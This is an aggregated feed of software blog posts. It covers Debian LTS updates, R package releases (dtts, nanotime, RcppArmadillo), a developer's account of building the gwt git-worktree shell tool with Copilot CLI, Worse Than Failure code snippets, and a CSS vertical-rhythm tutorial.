As usual, the thunderbird update, released as DLA 4511-1, was prepared by its maintainer Christoph Goehre. Many thanks for his continued contributions.

The LTS Team has also contributed updates to the latest Debian releases:

  • Andreas Henriksson completed the uploads of glib2.0 for both trixie and bookworm
  • Arnaud Rebillout: python-cryptography for trixie
  • Arnaud and Bastien worked together to prepare a ca-certificates-java release for unstable
  • Bastien completed the upload of gpsd for trixie that was proposed in January.
  • Bastien uploaded a regression update of apache2 for trixie
  • Bastien prepared a zabbix point update for trixie
  • Bastien, in collaboration with Markus, released netty updates for trixie and bookworm (DSA 6160-1)
  • Daniel Leidert proposed python-tornado releases for both trixie and bookworm.
  • Daniel also prepared a python-authlib update for trixie
  • Guilhem prepared a mapserver update for bookworm.
  • Lucas Kanashiro proposed merge requests to fix three CVEs in erlang for both trixie and bookworm
  • Sylvain Beucler continued the work to replace p7zip with 7zip in the different supported releases, and proposed a point update for bookworm
  • Tobias prepared trixie and bookworm security updates, released as DSA-6189-1
  • Utkarsh prepared trixie and bookworm security update for ruby-rack, released as DSA-6180-1

Individual Debian LTS contributor reports

Thanks to our sponsors

Sponsors that joined recently are in bold.

,

Planet DebianDirk Eddelbuettel: dtts 0.1.4 on CRAN: Maintenance

Leonardo and I are happy to announce another maintenance release 0.1.4 of our dtts package which has been on CRAN for four years now. dtts builds upon our nanotime package as well as the beloved data.table to bring high-performance and high-resolution indexing at the nanosecond level to data frames. dtts aims to offer the time-series indexing versatility of xts (and zoo) to the immense power of data.table while supporting highest nanosecond resolution.

This release, not unlike yesterday’s release of nanotime, is driven by recent changes in the bit64 package which underlies it. Michael, who now maintains it, had sent in two PRs to prepare for these changes. I updated continuous integration, and switched to Authors@R, and that pretty much is the release. The short list of changes follows.

Changes in version 0.1.4 (2026-04-23)

  • Continuous integration has received some routine updates

  • Adapt align() column names with changes in 'data.table' (Michael Chirico in #20)

  • Narrow imports to functions used for packages 'bit64', 'data.table' and 'nanotime' (Michael Chirico in #21)

Courtesy of my CRANberries, there is also a diffstat report for this release. Questions, comments, issue tickets can be brought to the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Planet DebianSergio Talens-Oliag: Developing a Git Worktree Helper with Copilot

Over the past few weeks I’ve been developing and using a personal command-line tool called gwt (Git Worktree) to manage Git repositories using worktrees. This article explains what the tool does, how it evolved, and how I used GitHub Copilot CLI to develop it (in fact, part of the idea of building the script was to test Copilot itself).

The Problem: Managing Multiple Branches

I was working on a project with multiple active branches, including orphans; the regular branches are for fixes or features, while the orphans are used to keep copies of remote documents or store processed versions of those documents.

The project also uses a special orphan branch that contains the scripts and the CI/CD configuration to store and process the external documents (it is on a separate branch to avoid mixing its operation with the main project code).

The plan is to trigger a pipeline against the special branch from remote projects to create or update the doc branch for it in our git repository, retrieving artifacts from the remote projects to get the files and put them on an orphan branch (initially I added new commits after each update, but I changed the system to use force pushes and keep only one commit, as the history is not really needed).

The original documents have to be changed, so, after ingesting them, we run a script that modifies them and adds or updates another branch with the processed version; the contents of that branch are used by the main branch build process (there we use git fetch and git archive to retrieve its contents).
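
That fetch-and-archive step is short; a minimal sketch of what the retrieval could look like (the branch and target directory names are assumptions, the real pipeline differs):

# Make sure the local copy of the processed branch is up to date
git fetch origin processed-docs
# Export its contents into the build tree without checking the branch out
mkdir -p build/docs
git archive --format=tar origin/processed-docs | tar -x -C build/docs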

When working on the scripts to manage the orphan branches I discovered the worktree feature of git, a functionality that allows me to keep multiple branches checked out in parallel using a single .git folder, removing the need to use git switch and git stash when changing between branches (until now I’ve been a heavy user of those commands).
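
For reference, the underlying git feature needs no wrapper at all; a minimal sketch of the plain worktree workflow that gwt builds on (paths and branch names are only examples):

# From an existing clone, check out another branch in a sibling directory
git worktree add ../fix-docs fix/docs
# List every checkout sharing the same repository data
git worktree list
# Remove the extra checkout once the branch is merged
git worktree remove ../fix-docs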

Reading about it I found that a lot of people use worktrees with the help of a wrapper script to simplify the management. After looking at one or two posts and the related scripts I decided to create my own using a specific directory structure to simplify things.

That’s how I started to work on the gwt script; as I also wanted to test copilot I decided to build it using its help (I have a pro license at work and wanted to play with the CLI version instead of the one integrated into an editor, as I didn’t want to learn a lot of new keyboard shortcuts).

The gwt Philosophy: Opinionated and Transparent

gwt enforces a simple, filesystem-visible model:

  • Exactly one bare repository named bare.git (treated as an implementation detail)
  • One worktree directory per branch where the directory name matches the branch name
  • Single responsibility: gwt doesn’t try to be a general git wrapper; it only handles operations that map cleanly to this layout

The repository structure looks like this:

my-repo/
+-- bare.git/           # the Git repository (internal)
+-- main/               # worktree for branch "main"
+-- feature/api/        # worktree for branch "feature/api"
+-- fix/docs/           # worktree for branch "fix/docs"
+-- orphan-history/     # worktree for the "orphan-history" branch

The tool follows five core design principles:

  1. Explicit over clever: Git commands are not hidden or reinterpreted
  2. Transparent execution: Every operation is printed before it happens
  3. Safe, preview-first operations: Destructive commands default to preview, confirmation, then apply
  4. Shell-agnostic core: The script never changes the caller’s working directory (shell wrappers handle that)
  5. Opinionated but minimal: Only commands that fit the layout model are included

Core Commands

The script provides these essential commands:

  • gwt init <url> — Clone a repository and set up the gwt layout
  • gwt convert <dir> — Convert an existing Git checkout to the gwt layout
  • gwt add [--orphan] <branch> [<base>] — Create a new worktree (optionally orphaned)
  • gwt remove <branch> — Remove a worktree and unregister it (asks the user to remove the local branch too, useful when removing already merged branches)
  • gwt rename <old> <new> — Rename a branch AND its worktree directory
  • gwt list — List all worktrees
  • gwt default [<branch>] — Get or set the default branch
  • gwt current — Print the current worktree or branch name

Except for init and convert, all of the commands work inside a directory structure that follows the gwt layout; the tool looks for the bare.git folder to find the root folder of the structure.
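
A minimal sketch of how that root discovery could be implemented (the function name is an assumption, not the actual gwt code):

# Walk upwards from the current directory until a bare.git folder is found
find_gwt_root() {
  dir="$PWD"
  while [ "$dir" != "/" ]; do
    if [ -d "$dir/bare.git" ]; then
      printf '%s\n' "$dir"
      return 0
    fi
    dir="$(dirname "$dir")"
  done
  echo "error: not inside a gwt layout" >&2
  return 1
}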

As I don’t want to hide which commands are really used by the wrapper, all git and filesystem operations pass through a single run shell function that prints each command before executing it. This gives complete visibility into what the tool is doing.
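
A minimal sketch of what such a helper could look like (the real implementation in gwt may differ):

# Print each command before running it, so nothing happens silently
run() {
  printf '+ %s\n' "$*"
  "$@"
}

# Example: every git call in the script goes through run
run git -C bare.git worktree list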

Also, destructive operations (remove, rename) default to preview mode:

$ gwt remove feature-old --dry-run

+ git -C bare.git branch -d feature-old
+ git -C bare.git worktree remove feature-old/

Apply these changes? [y/N]:

The user sees exactly what will happen, can verify it’s correct, and only then confirm execution.

Incremental Development with Copilot

The gwt script has grown from 597 lines in its original version (git-wt) to 1,111 lines when writing the first draft of this post.

This growth happened through incremental, test-driven development, with each feature being refined based on real usage patterns.

What follows is a little history of the script evolution written with the help of git log.

Initial version

First I wrote a design document and asked copilot to create the initial version of the git-wt script with the original core commands.

I started to use the tool with a remote repository (I made copies of the branches in some cases to avoid losing work) and fixed bugs (trivial ones with neovim, larger ones asking copilot to fix the issues for me, so I had less typing to do).

First command update

One of the first commands I had to enhance was rename:

  • as I normally use branches with / in their names and my tool checks out the worktrees using the branch name as the path inside the gwt root folder (i.e. a fix/rename branch creates the fix directory and checks the branch out inside the fix/rename folder), the rename command had to clean up the empty parent directories (see the sketch after this list)
  • when renaming a worktree we move the folders and fix the references using the worktree repair command to make things work locally, but the rename also affects the remote branch reference; to avoid surprises the command unsets the remote branch reference so it can be pushed again using the new name (of course, the user is responsible for managing the old remote branch, as gwt can’t guess what it should do with it).
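
A minimal sketch of the parent-directory cleanup mentioned in the first item (the path is an example; the real command also repairs the worktree metadata and handles the remote reference as described above):

# After renaming the fix/rename worktree away, drop any now-empty parents
old_dir="fix/rename"
parent="$(dirname "$old_dir")"
while [ "$parent" != "." ] && [ -d "$parent" ]; do
  rmdir "$parent" 2>/dev/null || break   # stops at the first non-empty directory
  parent="$(dirname "$parent")"
done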

Integration with the shell

As I use zsh with the Powerlevel10k theme I asked copilot to help me add visual elements to the prompt when working with gwt folders, something that I would have never tried without help, as it would have required a lot of digging on my part on how to do it, as I never looked into it.

The initial version of the code was in an independent file that I sourced from my .zshrc file. It prints on the right part of the prompt when we are inside a gwt folder (note that if the folder is a worktree we see the existing git integration text right before it, so we keep the previous behavior and we can see that it is a gwt friendly repo), and if we are on the root folder or the bare.git folder we see gwt or bare (I added that text because there are no git prompts on those folders).

I also asked copilot to create zsh autocompletion functions (I only use zsh, so I didn’t add autocompletion for other shells). The good thing here is that I wouldn’t have done that manually, as it would have required some reading to get it right, but the output of copilot worked and I can update things using it or manually if I need to.

One thing I was missing from the script was the possibility of changing the working directory easily, so I wrote a gwt wrapper function for zsh that intercepts commands that require shell cooperation (changing the working directory) and delegates everything else to the core script.

Currently the function supports the following enhanced commands:

  • cd [<branch>]: change into a worktree or the default one if missing
  • convert <dir>: convert a checkout, then cd into the initial worktree
  • add [--orphan] <branch> [<base>]: create a worktree, then cd into it on success
  • rename <old> <new>: rename a worktree, then cd into it if we were inside it

Note that the cd command will not work on other shells or if the user does not load my wrapper, but the rest will still work without the working directory changes.
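
A minimal sketch of the wrapper idea (the gwt path subcommand used here is hypothetical, standing in for however the real script reports a worktree location; the actual function handles more commands and error cases):

gwt() {
  case "$1" in
    cd)
      # Ask the core script where the worktree lives, then change into it
      local dir
      dir="$(command gwt path "${2:-}")" || return 1
      cd "$dir"
      ;;
    *)
      # Everything else is delegated to the core script unchanged
      command gwt "$@"
      ;;
  esac
}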

Renaming the command

As I felt that git-wt was a long name I renamed the tool to gwt. I could have done it by hand, but using copilot I didn’t have to review all the files by myself, and it did it right (note that I have it configured to always ask me before making changes, as it sometimes tries to do something I don’t want and I like to check its changes; as I have the files in git repos, I manually add the files when I like the status, and if the CLI output is not clear I allow it to apply the change and check the effects with git diff so I can validate or revert what was done).

The convert command

After playing with one repo I added the convert subcommand for migrating existing checkouts. It seemed a simple task at first, but it took multiple iterations to get it right, as I found multiple issues while testing (in fact I made copies of the existing checkouts to be able to re-test each update, as some of the iterations broke them).

The version of the function when this post was first edited had the following comment explaining what it does:

# ---------------------------------------------------------------------------
# convert - convert an existing checkout into the gwt layout
# ---------------------------------------------------------------------------
#
# Must be run from the parent directory of <dir>.
#
# Steps:
#   1. Read branch from the checkout's HEAD
#   2. Rename <dir> to <dir>.wt.tmp (sibling, same filesystem)
#   3. Create <dir>/ as the new gwt root
#   4. Move <dir>.wt.tmp/.git to <dir>/bare.git; set core.bare = true
#   5. Fix fetch refspec (bare clone default maps refs directly, no remotes/)
#   6. Add a --no-checkout worktree so git wires up the metadata and
#      creates <dir>/<branch>/.git (the only file in that dir)
#   7. Move that .git file into the real working tree (<dir>.wt.tmp)
#   8. Remove the now-empty placeholder directory
#   9. Move the real working tree into place as <dir>/<branch>
#  10. Reset the index to HEAD so git status is clean
#      (--no-checkout leaves the index empty)
#  11. Create <dir>/.git -> bare.git symlink so plain git commands work
#      from the root without --git-dir
#
# The .git file ends up at the same absolute path git recorded in step 6,
# so no worktree repair is needed. Working tree files are never modified.

The .git link was added when I noticed that I could run commands that don’t need the checked out files from the root of the gwt structure, which is handy sometimes (e.g. a git fetch, or a git log that shows the log of the branch marked as default).

After playing with commands that used the bare.git folder I updated the init and convert commands to keep the origin refs, ensuring that the remote tracking works correctly.
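
The refspec part of that work (step 5 in the comment above) amounts to giving the bare repository the fetch configuration a normal clone would have; a minimal sketch, assuming the remote is called origin:

# Restore the usual remote-tracking layout that bare clones lack by default
git -C bare.git config remote.origin.fetch '+refs/heads/*:refs/remotes/origin/*'
git -C bare.git fetch origin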

Improving the add command

While playing with the tool on more repos I noticed that I also had to enhance the add command to better handle worktree creation, depending on my needs.

Right now the tool supports the following use cases (a rough sketch of the resulting logic follows the list):

  • if the branch exists locally or on origin, it just checks it out.
  • if the branch does not exist, we create it using the given base branch or, if no base is given, the current worktree (if we are in the root folder or bare.git the command fails).
  • as I needed it for my project, I added a --orphan option to be able to create orphan branches directly.
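
A rough sketch of that decision logic, reusing the run helper described earlier (the orphan, base and current_branch variables are assumptions and error handling is omitted; the actual gwt code is more thorough):

# Run from the gwt root; $branch comes from the command line
if git -C bare.git show-ref --verify --quiet "refs/heads/$branch"; then
  run git -C bare.git worktree add "../$branch" "$branch"              # existing local branch
elif git -C bare.git show-ref --verify --quiet "refs/remotes/origin/$branch"; then
  run git -C bare.git worktree add --track -b "$branch" "../$branch" "origin/$branch"
elif [ "$orphan" = "yes" ]; then
  run git -C bare.git worktree add --orphan -b "$branch" "../$branch"  # --orphan needs a recent git
else
  run git -C bare.git worktree add -b "$branch" "../$branch" "${base:-$current_branch}"
fi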

Moving to a single file

Eventually I decided to make the tool self contained; I removed the design document (I moved the content to comments on the top of the script and details to comments on each function definition) and added a pair of commands to print the code to source for the p10k and zsh integration (autocompletion & functions), leaving everything in a single file.

Now my .zshrc file adds the following to source both things:

# After loading the p10k configuration
if type gwt >/dev/null 2>&1; then
  source <(gwt p10k)
fi
[...]
# After loading autocompletion
if type gwt >/dev/null 2>&1; then
  source <(gwt zsh)
fi

Versioning

As I modified the script I found it interesting to use CalVer-based versioning (the version variable has the format YYYY.mm.dd-r#), so I added a subcommand to show its value or bump it using the current date and computing the right revision number.
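
A minimal sketch of how such a bump can be computed (the current_version variable is an assumption; the real subcommand reads and rewrites the version inside the script itself):

# Bump a CalVer string of the form YYYY.mm.dd-r<N>
today="$(date +%Y.%m.%d)"
case "$current_version" in
  "$today"-r*) rev=$(( ${current_version##*-r} + 1 )) ;;  # same day: next revision
  *)           rev=1 ;;                                   # new day: start again at r1
esac
new_version="${today}-r${rev}"
echo "$new_version"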

About the use of copilot

Although I’ve never been a fan of AI tools I have to admit that the copilot CLI has been very useful for building the tool:

  • Rapid prototyping: Each commit represented a small feature or fix that I could implement, test immediately in my actual workflow, and iterate on based on the result
  • Edge case handling: Rather than trying to anticipate every scenario upfront, I could ask Copilot how to handle edge cases as they appeared in real usage
  • Script refinement: Questions like "how do I clean up empty directories after a rename" or "how do I detect if I’m inside a specific worktree" were quickly answered with working code
  • Shell integration: The Zsh wrapper and completion system grew from simple prototypes to sophisticated features, with each iteration informed by how I actually used the tool

For example, the convert command started as a simple rename operation, but evolved to also create a .git symlink and intelligently handle various migration scenarios—all because I used it repeatedly and refined the implementation each time.

Self-Contained and Opinionated

gwt is deliberately opinionated:

  • Zsh & Powerlevel10k Integration: The tool includes built-in Zsh shell integration, accessed via source <(gwt zsh) and supports adding a prompt segment when using p10k, as described earlier.
  • Directory Structure: The bare.git directory name is non-negotiable. This is how gwt discovers the repository root from any subdirectory, and how the tool knows whether a directory is a gwt repository. The simplicity of this marker means the discovery mechanism is foolproof and requires no configuration.
  • No Configuration Files: gwt deliberately has no configuration. There are no .gwtrc files or config directories. This makes it portable; the tool works the same way everywhere, and repositories can be shared across systems without synchronizing configuration.

From Script to System

What started as a small helper script for managing worktrees has become a complete system:

  1. Core script (gwt): 1,111 lines of pure shell, no external dependencies
  2. Shell integration: Zsh functions and completions
  3. Prompt integration: Powerlevel10k segment
  4. Documentation: Built-in help and design philosophy documentation

The script is self-contained: everything needed for the tool to work is in a single file.

This makes it trivial to update (just replace the script) or audit (no hidden dependencies).

Development with AI support

Developing gwt with copilot taught me some things:

  • Incremental refinement works well for small tools: Each iteration informed the next, resulting in a tool that handles real use cases elegantly
  • Transparency is a feature: Making operations visible builds confidence and is easier to debug
  • Opinionated tools can be powerful: By constraining the problem space (one bare repo, one worktree per branch), the solution becomes simpler and more robust
  • Shell integration matters: The same core commands are easier to use when they can automatically change directories and provide completions
  • Real-world testing is essential: I wouldn’t have discovered the need for automatic directory cleanup or context-aware cd behavior without actually using the tool daily

What was next?

The tool is stable and handles my daily workflow well, so my guess is that I would keep using it and fixing issues if or when I found them, but I do not plan to include additional features unless I find a use case that justifies it (i.e. I never added support for some of the worktree subcommands, as it is easier to use the git versions if I ever needed them).

What really happened

While editing this post I discovered that I needed to add another command to it and fixed a bug (see below).

With those changes and the inclusion of a license and copyright notice (just in case I distribute it at some point), the script is now 1,217 lines long instead of the 1,111 it had when I started to write this entry.

Submodule Support

When I converted this blog repository to the gwt format and tried to preview the post using docker compose, it failed because the worktree I was on didn’t have the Git submodule initialized.

My blog theme is included in the repository as a submodule, and when I used gwt to check out different branches in worktrees, the submodule was not initialized in the new worktrees.

This led me to add a new internal function and a gwt submodule command to handle submodule initialization; the internal function is called from convert and add (when converting a repo or adding a worktree) and the public command is useful for updating the submodules on existing branches.
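
The underlying operation is just a submodule initialisation run inside the affected worktree; a minimal sketch (the worktree path is an example):

# Initialise and update submodules inside a freshly created worktree
run git -C "feature/api" submodule update --init --recursive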

Path Handling with Branch Names Containing Slashes

The second discovery was a bug in how the tool handled branch names containing slashes (e.g., feature/new-api, docs/user-guide). The worktree directories are created with the branch name as the path, so a branch like feature/new-api creates two nested folders (feature, with new-api inside it).

However, there was a mismatch in how the zsh wrapper function resolved worktree paths (initially it used shell parameter expansion, i.e. rel="${cwd#"$REPO_ROOT"/}"), versus how the core script calculated them, causing the cd command to fail or navigate to the wrong location when branch names contained slashes.

The fix involved ensuring consistent path resolution throughout the script and wrapper (now it uses a function that processes the git worktree list output), so that gwt cd feature/new-api correctly navigates to the worktree directory regardless of path depth.
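
A minimal sketch of a porcelain-based lookup (the helper name is an assumption; the real code lives partly in the script and partly in the zsh wrapper):

# Print the directory registered for a branch, using git's own worktree records
worktree_path_for() {
  branch="$1"
  git -C bare.git worktree list --porcelain |
    awk -v want="refs/heads/$branch" '
      /^worktree / { path = substr($0, 10) }
      /^branch /   { if ($2 == want) { print path; exit } }
    '
}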

Conclusion

gwt is a tool that solves a real problem: managing multiple Git branches simultaneously without context-switching overhead.

I’m sure I’m going to keep using it for my projects, as it simplifies some workflows; I’ll still use switch and stash in some cases, but I like working with multiple worktrees in parallel.

In fact I converted this blog repository checkout to the gwt format to work on a separate branch, as it felt like the right approach even if I’m the only one using the repo now, and it helped me improve the tool, as explained before.

Also, it was a good example of how to use AI tools like copilot to develop a simple tool and keep it evolving while using it.

In any case, although I find copilot useful and it has saved me time, I don’t trust it to work without supervision: it worked well overall, but it got stuck at times and on multiple occasions didn’t do things the way I wanted.

I also have an additional problem now… I’ve been reading about it, but I don’t really know which models to use or how the premium requests are computed (I’ve only been playing with it since last month and I ran out of requests on the last day of the month on purpose, just to see what happened… it stops working ;).

On my work machine I’ve been using a specific user account with a GitHub Copilot Business subscription and I only used the Anthropic Claude Sonnet 4.6 model and with my personal account I configured the Anthropic Claude Haiku 4.5 model, but I’ve only used that to create the initial draft of this post (I ended up rewriting most of it manually anyway) and to review the final version (I’m not a native speaker and it was useful for finding typos and improving the style in some parts).

I guess I’ll try other models with copilot in the future and check other command line tools like aider or claude-code, but probably only using free accounts unless I get a paid account at work, as I have with GitHub Copilot.

To be fair, what I would really love is to be able to use local models (aider can do it), but the machines I have are not powerful enough. I tried to run a simple test and it felt really slow, but when I have the time or the need I’ll try again, just in case.

Worse Than FailureCodeSOD: Tune Out the Static

Henrik H (previously) sends us a simple representative C# line:

static void GenerateCommercilaInvoice()

This is a static method which takes no parameters and returns nothing. Henrik didn't share the implementation, but this static function likely does something that involves side effects, maybe manipulating the database (to generate that invoice?). Or, possibly worse, it could be doing something with some global or static state. It's all side effects and no meaningful controls, so enjoy debugging that when things go wrong. Heck, good luck testing it. Our best case possibility is that it's just a wrapper around a call to a stored procedure.

This method signature is basically a commercila for refactoring.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

365 TomorrowsDéjà vu

Author: Kewei Chen I have been staying in this mountain temple for a long time, long enough that I’ve grown used to its rhythm. The place feels colder than I remember. Not sharply so, just something you notice before fully awake. The wooden floor beneath me still holds last night’s cold a little too long. […]

The post Déjà vu appeared first on 365tomorrows.

,

Planet DebianDirk Eddelbuettel: nanotime 0.3.14 on CRAN: Upstream Maintenance

Another minor update 0.3.14 for our nanotime package is now on CRAN, and has compiled for r2u (and will have to wait to be uploaded to Debian until dependency bit64 has been updated there). nanotime relies on the RcppCCTZ package (as well as the RcppDate package for additional C++ operations) and offers efficient high(er) resolution time parsing and formatting up to nanosecond resolution, using the bit64 package for the actual integer64 arithmetic. Initially implemented using the S3 system, it has benefitted greatly from a rigorous refactoring by Leonardo who not only rejigged nanotime internals in S4 but also added new S4 types for periods, intervals and durations.

This release has been driven almost entirely by Michael, who took over as bit64 maintainer and has been making changes there that have an effect on us ‘downstream’. He reached out with a number of PRs which (following occasional refinement and smoothing) have all been integrated. There are no user-facing changes, or behavioural changes or enhancements, in this release.

The NEWS snippet below has the fuller details.

Changes in version 0.3.14 (2026-04-22)

  • Tests were refactored to use NA_integer64_ (Michael Chirico in #149 and Dirk in #156)

  • nanoduration was updated for changes in bit64 4.8.0 (Michael Chirico in #152 fixing #151)

  • Use of as.integer64(keep.names=TRUE) has been refactored (Michael Chirico in #154 fixing #153)

  • In tests, nanotime is attached after bit64; this still needs a better fix (Michael Chirico in #155)

  • The package now has a hard dependency on the just released bit64 version 4.8.0 (or later)

Thanks to my CRANberries, there is a diffstat report for this release. More details and examples are at the nanotime page; code, issue tickets etc at the GitHub repository – and all documentation is provided at the nanotime documentation site.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Planet DebianVincent Bernat: CSS & vertical rhythm for text, images, and tables

Vertical rhythm aligns lines to a consistent spacing cadence down the page. It creates a predictable flow for the eye to follow. Thanks to the rlh CSS unit, vertical rhythm is now easier to implement for text.1 But illustrations and tables can disrupt the layout. The amateur typographer in me wants to follow Bringhurst’s wisdom:

Headings, subheads, block quotations, footnotes, illustrations, captions and other intrusions into the text create syncopations and variations against the base rhythm of regularly leaded lines. These variations can and should add life to the page, but the main text should also return after each variation precisely on beat and in phase.

― Robert Bringhurst, The Elements of Typographic Style

Text

Three factors govern vertical rhythm: font size, line height and margin or padding. Let’s set our baseline with an 18-pixel font and a 1.5 line height:

html {
  font-size: 112.5%;
  line-height: 1.5;
}
h1, h2, h3, h4 {
  font-size: 100%;
}
html, body,
h1, h2, h3, h4,
p, blockquote,
dl, dt, dd, ol, ul, li {
  margin: 0;
  padding: 0;
}

CSS Values and Units Module Level 4 defines the rlh unit, equal to the computed line height of the root element. All browsers support it since 2023.2 Use it to insert vertical spaces or to fix the line height when altering font size:3

h1, h2, h3, h4 {
  margin-top: 2rlh;
  margin-bottom: 1rlh;
}
h1 {
  font-size: 2.4rem;
  line-height: 2rlh;
}
h2 {
  font-size: 1.5rem;
  line-height: 1rlh;
}
h3 {
  font-size: 1.2rem;
  line-height: 1rlh;
}
p, blockquote, pre {
  margin-top: 1rlh;
}
aside {
  font-size: 0.875rem;
  line-height: 1rlh;
}

We can check the result by overlaying a grid4 on the content:

Screenshot of my website with a grid as an overlay and each line of text fitting on the grid
Using CSS rlh unit to set vertical space works well for text. You can display the grid using Ctrl+Shift+G.

If a child element uses a font with taller intrinsic metrics, it may stretch the line’s box beyond the configured line height.5 A workaround is to reduce the line height to 1. The glyphs overflow but don’t push the line taller.

code, kbd {
  line-height: 1;
}

Responsive images

Responsive images are difficult to align on the grid because we don’t know their height. CSS Rhythmic Sizing Module Level 1 introduces the block-step property to adjust the height of an element to a multiple of a step unit. But most browsers don’t support it yet.

With JavaScript, we can add padding around the image so it does not disturb the vertical rhythm:

const targets = document.querySelectorAll(".lf-media-outer");
const adjust = (el, height) => {
  const rlh = parseFloat(getComputedStyle(document.documentElement).lineHeight);
  const padding = Math.ceil(height / rlh) * rlh - height;
  el.style.padding = `${padding / 2}px 0`;
};

targets.forEach((el) => adjust(el, el.clientHeight));
Screenshot of my website with a grid as an overlay and an image not breaking the vertical rhythm. Additional padding is visible before and after the image. The height of the image with padding is 216.
The image is snapped to the grid thanks to the additional padding computed with JavaScript. 216 is divisible by 27, our line height in this example.

As the image is responsive, its height can change. We need to wrap a resize observer around the adjust() function:

const ro = new ResizeObserver((entries) => {
  for (const entry of entries) {
    const height = entry.contentBoxSize[0].blockSize;
    adjust(entry.target, height);
  }
});
for (const target of targets) {
  ro.observe(target);
}

Tables

Table cells could set 1rlh as their height but they would feel constricted. Using 2rlh wastes too much space. Instead, we use incremental leading: we align one in every five lines.

table {
  border-spacing: 2px 0;
  border-collapse: separate;
  th {
    padding: 0.4rlh 1em;
  }
  td {
    padding: 0.2rlh 0.5em;
  }
}

To align the elements after the table, we need to add some padding. We can either reuse the JavaScript code from images or use a few lines of CSS that count the regular rows and compute the missing vertical padding:

table:has(tbody tr:nth-child(5n):last-child)   { padding-bottom: 0.2rlh; }
table:has(tbody tr:nth-child(5n+1):last-child) { padding-bottom: 0.8rlh; }
table:has(tbody tr:nth-child(5n+2):last-child) { padding-bottom: 0.4rlh; }
table:has(tbody tr:nth-child(5n+3):last-child) { padding-bottom: 0 }
table:has(tbody tr:nth-child(5n+4):last-child) { padding-bottom: 0.6rlh; }

A header cell has twice the padding of a regular cell. With two regular rows, the total padding is 2×2×0.2+2×0.4=1.6. We need to add 0.4rlh to reach 2rlh of extra vertical padding across the table.

Screenshot of my website with a grid as an overlay and a table following the vertical rhythm. Additional padding is visible after the table. The height of the table with padding is 405.
One line out of five is aligned to the grid. Additional padding is added after the table to not break the vertical rhythm. 405 is divisible by 27, our line height in this example.

None of this is necessary. But once you start looking, you can’t unsee it. Until browsers implement CSS Rhythmic Sizing, a bit of CSS wizardry and a touch of JavaScript is enough to pull it off. The main text now returns after each intrusion “precisely on beat and in phase.”


  1. See “Vertical rhythm using CSS lh and rlh units” by Paweł Grzybek. ↩

  2. For broader compatibility, you can replace 2rlh with calc(var(--line-height) * 2rem) and set the --line-height custom property in the :root pseudo-class. I wrote a simple PostCSS plugin for this purpose. ↩

  3. It would have been nicer to compute the line height with calc(round(up, calc(2.4rem / 1rlh), 0) * 1rlh). Unfortunately, typed arithmetic is not supported by Firefox yet. Moreover, browsers support round() only since 2024. Instead, I coded a PostCSS plugin for this as well. ↩

  4. The following CSS code defines a grid tracking the line height:

    body {
      position: relative;
    }
    body::after {
      content: "";
      position: absolute;
      inset: 0;
      z-index: 9999;
      background: linear-gradient(180deg, #c8e1ff99 1px, transparent 1px);
      background-size: 20px 1rlh;
      pointer-events: none;
    }
    

    ↩

  5. See “Deep dive CSS: font metrics, line-height and vertical-align” by Vincent De Oliveira. ↩

Cryptogram ICE Uses Graphite Spyware

ICE has admitted that it uses spyware from the Israeli company Graphite.

Worse Than FailureRepresentative Line: Comment Overflow

Today, we look at a representative comment, sent to us by Nona. This particular comment was in a pile of code delivered by an offshore team.

// https://stackoverflow.com/questions/46744740/lodash-mongoose-object-id-difference/46745169

"Wait," you say, "what's the WTF about a comment pointing to a Stack Overflow page. I do that all the time?"

In this case, it's because this particular comment wasn't given any further explanation. It also wasn't in a block of code that was doing anything with either lodash, Mongoose, or set differences. It was, however, repeated multiple times throughout the codebase, because the entire codebase was a pile of copy-pasta glued together with the bare minimum code to make it work.

In at least one place, the comment was probably correct and helpful. But it got swept up as part of a broader copy/paste exercise, and now is scattered through the code without any true purpose.

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsThe Engineer

Author: Mark Renney Cartwright tends to the machine, the work is all-consuming but perfunctory at best. He cleans the machine and he replaces the data chips. It is vital this is done in the correct order and at the opportune moment, when the machine is able to upload that particular information. The machine and the […]

The post The Engineer appeared first on 365tomorrows.

,

Planet DebianDirk Eddelbuettel: RcppArmadillo 15.2.6-1 on CRAN: Several Updates

armadillo image

Armadillo is a powerful and expressive C++ template library for linear algebra and scientific computing. It aims towards a good balance between speed and ease of use, has a syntax deliberately close to Matlab, and is useful for algorithm development directly in C++, or quick conversion of research code into production environments. RcppArmadillo integrates this library with the R environment and language–and is widely used by (currently) 1263 other packages on CRAN, downloaded 45.7 million times (per the partial logs from the cloud mirrors of CRAN), and the CSDA paper (preprint / vignette) by Conrad and myself has been cited 683 times according to Google Scholar.

This version updates to the 15.2.5 and 15.2.6 upstream Armadillo releases from, respectively, two and five days ago. The package has already been updated for Debian, and built for r2u. When we ran the reverse-dependency check for 15.2.5 at the end of last week, one package failed. I got in touch with the authors, filed an issue, poked some more, isolated the one line that caused an example to fail … and right then 15.2.6 came out fixing just that. It was after all an upstream issue. We used to run these checks before Conrad made a release, he now skips this and hence needed a quick follow-up release. It can happen.

The other big change is that this R package release phases out the ‘dual support’ for both C++14 or newer (as in current Armadillo) along with a C++11 fallback for more slowly updating packages. I am happy to say that after over eight months of this managed transition (during which CRAN expelled some laggard packages that were not moving on from C++11) all packages now use C++14 or newer, which is nice. And I will take this as an opportunity to stress that one can in fact manage a disruptive API change this way as we just demonstrated. Sadly, R Core does not seem to have gotten that message, and rollout of this package was also still a little delayed because of the commotion created by the last minute API changes preceding the R 4.6.0 release later this week.

Smaller changes in the package are a switch in pdf vignette production to the Rcpp::asis() driver, and a higher-precision computation in rmultinom() (matching a change made in R-devel during last week in its use of Kahan summation). All detailed changes since the last CRAN release follow.

Changes in RcppArmadillo version 15.2.6-1 (2026-04-20)

  • Upgraded to Armadillo release 15.2.6 (Medium Roast Deluxe)

    • Ensure internally computed tolerances are not NaN
  • The rmultinom deploys 'Kahan summation' as R-devel does now.

Changes in RcppArmadillo version 15.2.5-1 [github-only] (2026-04-18)

  • Upgraded to Armadillo release 15.2.5 (Medium Roast Deluxe)

    • Fix for handling NaN elements in .is_zero()

    • Fix for handling NaN in tolerance and conformance checks

    • Faster handling of diagonal views and submatrices with one row

